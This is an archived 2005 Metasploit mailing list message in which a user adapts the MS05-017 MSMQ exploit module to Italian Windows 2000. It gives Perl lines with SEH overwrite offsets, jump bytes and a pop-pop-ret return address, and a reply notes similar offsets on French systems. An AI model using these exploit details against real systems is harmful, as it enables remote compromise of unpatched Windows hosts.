Metasploit mailing list archives
msmq_deleteobject_ms05_017.pm different offset for different languages
From: jerome.athias at free.fr (Jerome Athias)
Date: Tue, 13 Dec 2005 16:42:14 +0100
oops i read this too fast, i've allready see this (different offsets between US and FR) with French platforms yes ... msf-list at jervus.it wrote:
Hi i'm playing with msmq_deleteobject_ms05_017.pm
with my win00 Italian version (SP0) and the exploit don't work;
after a little debug session i understand why.
For the italian version the correct offset is 360 so i have add this:
# Windows 2000 Italian SP0 SEH offset
substr($pattern, 360 + $hlen + 0, 4, pack('V', $target->[1]));
substr($pattern, 360 + $hlen - 4, 2, "\xeb\x22");
for the english version (win00)the offset is:
# Windows 2000 SEH offset goes first
substr($pattern, 332 + $hlen + 0, 4, pack('V', $target->[1]));
substr($pattern, 332 + $hlen - 4, 2, "\xeb\x22");
It's the same for the Win00 Advenced Server Italian version (SP4)
The only differnce is the offset, the return address is always the
x004014e9 (pop pop ret)
Someone know if the same for different languages?
For example French,Spanish or German version of win00?
Thank you for your attention and sorry for my bad english :-(
Ciao
Acaro
Current thread:
- msmq_deleteobject_ms05_017.pm different offset for different languages msf-list at jervus.it (Dec 13)
- msmq_deleteobject_ms05_017.pm different offset for different languages Jerome Athias (Dec 13)
- msmq_deleteobject_ms05_017.pm different offset for different languages Jerome Athias (Dec 13)
- msmq_deleteobject_ms05_017.pm different offset for different languages msf-list at jervus.it (Dec 13)
- msmq_deleteobject_ms05_017.pm different offset for different languages H D Moore (Dec 13)
- msmq_deleteobject_ms05_017.pm different offset for different languages okasvi (Dec 13)
- msmq_deleteobject_ms05_017.pm different offset for different languages msf-list at jervus.it (Dec 13)